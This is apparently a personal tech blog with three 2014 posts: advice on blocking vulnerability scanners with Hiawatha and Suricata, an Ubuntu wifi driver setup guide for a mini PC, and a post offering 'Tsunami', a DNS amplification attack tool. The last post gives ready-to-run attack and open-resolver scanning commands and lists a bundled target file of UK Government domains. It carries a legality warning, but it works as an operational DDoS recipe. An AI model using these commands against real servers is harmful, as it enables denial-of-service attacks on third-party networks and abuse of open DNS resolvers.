Friday, July 18, 2014
In my opinion, the best way to defense your network and servers from being attacked is to interfere with the intruders' reconnaissance. When intruders cannot get any valuable information, they cannot perform the attack properly.
Most of the intruders use automatic tools, such as vulnerability scanners, to perform the reconnaissance and they seldom do it manually as it is harder for them especially for web applications. However, a small portion of advanced intruders may do it manually.
Hiawatha, a secure and advanced web server, can be configured to block vulnerability scanners from scanning the web server. Since the vulnerability scanners do not work properly, intruders cannot get any valuable information on the web server in order to launch an attack.
Suricata, a high performance network IDS, IPS and network security monitoring engine, used with Emerging Threats rules can be configured to drop the packet of the vulnerability scanners from scanning.
Web Application Firewall (WAF) and Intrusion Detection/Prevention System (IDS/IPS) as well as firewall can be bypassed by some of the advanced intruders. Therefore, blocking the vulnerability scanners is one of the good ways to defense your network and server from being attacked.
That's all! See you.
Tuesday, July 15, 2014
Thursday, July 03, 2014
You may need a powered USB hub to connect the keyboard and mouse as well as install device (such as USB DVD-ROM or USB pendrive). Since it comes with 32GB/64GB eMMC (SSD drive), you may required to connect to an external hard drive for more storage.
The maximum power consumption is about 12W under Ubuntu 14.04 LTS.
The sound and network device are working out of the box. However, the wireless and bluetooth devices do not work properly even you download the wireless driver from the official site (it is still beta at the moment).
After some tries and fails, I finally make the wireless device working. However, the bluetooth device does not work at the moment.
How I make the wireless device working? Here you are :
Step 1 :
Write down the MAC address of the wireless card.
Step 2 :
Download the beta driver from the official site. Extract it and go to ~/Downloads/Ubuntu/WLAN.
Rename the "brcmfmac-sdio.txt" to "brcmfmac-43241b4-sdio.txt".
mv brcmfmac-sdio.txt brcmfmac43241b4-sdio.txt
Change the "macaddr" at brcmfmac43241b4-sdio.txt to the previous written down MAC address.
Step 3 :
Move the /lib/firmware/brcm directory to another place.
sudo mv /lib/firmware/brcm ~/Downloads/
Step 4 :
Install git package.
sudo apt-get install git
Download the wireless firmware.
git clone git://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git
After that copy the ~/Downloads/linux-firmware/brcm to /lib/firmware/.
sudo cp -R ~/Downloads/linux-firmware/brcm /lib/firmware/
Copy the brcmfmac43241b4-sdio.txt to /lib/firmware/brcm/.
sudo cp ~/Downloads/Ubuntu/WLAN/brcmfmac43241b4-sdio.txt /lib/firmware/brcm/
Step 5 :
Comment out the blacklist.
sudo nano /etc/modprobe.d/blacklist.conf
Locate "blacklist bcm43xx" and make it to "#blacklist bcm43xx".
Step 6 :
Reboot the box.
However, the wifi signal is not very strong indeed.
You may need to do some changing on the box with the following package :
sudo apt-get install libavcodec-extra
sudo apt-get install indicator-cpufreq
To increase the performance, you need to NOT to use SWAP.
sudon nano /etc/rc.local
Insert the following before "exit 0" :
sysctl -w vm.swappiness=0
Then, reboot your box.
For the video playback, you are required to install the following packages.
sudo add-apt-repository ppa:sander-vangrieken/vaapi
sudo apt-get update
sudo apt-get install mplayer-vaapi gstreamer1.0-vaapi gstreamer1.0-libav libva-intel-vaapi-driver vainfo mencoder-vaapi
That's all! See you.
Link : 10 things to do after installing Ubuntu
3rdman have an alternative way to fix the wifi problem.
Wednesday, July 02, 2014
Tsunami is a DNS Amplification Attack Tool which is collected from the internet and modified by Samiux. It is designed for testing your server and/or network under the DNS Amplification Attack. Perform this test on any server and/or network without authorization is a crime and you will be put into a jail.
The number of open recursive DNS servers and the bandwidth of the attacker as well as duration may affect the traffic volume size of the attack.
Tsunami is working perfectly on Kali Linux 1.0.7 or above. The official site is at here.
To perform DNS Amplification attack :
python amplfiy.py -t 220.127.116.11 -s open_dns.txt -a domain_name.txt -c -1 --verify -v --threads=1000
*where 18.104.22.168 is the victim's IP address
To scan for the open recursive DNS server :
perl find_open_resolvers.pl '22.214.171.124 - 126.96.36.199' -q 1000
Remarks : this script just can check if the DNS server has the RA flag or not only. You need to double check with the following command to confirm the scanned DNS server is a true open recursive DNS server.
dig ANY isc.org @samsung.idv.tw
*where samsung.idv.tw is the open recursive DNS server
where isc.org is the domain to lookup
Tsunami comes with the following files :
amplfiy.py - the attack script
find_open_resolvers.pl - the scanner script
gov-uk_domain.txt - domain names of UK Government
open_dns_188.8.131.52-184.108.40.206.txt - open recursive DNS list within 220.127.116.11 and 18.104.22.168 IP range
That's all! See you.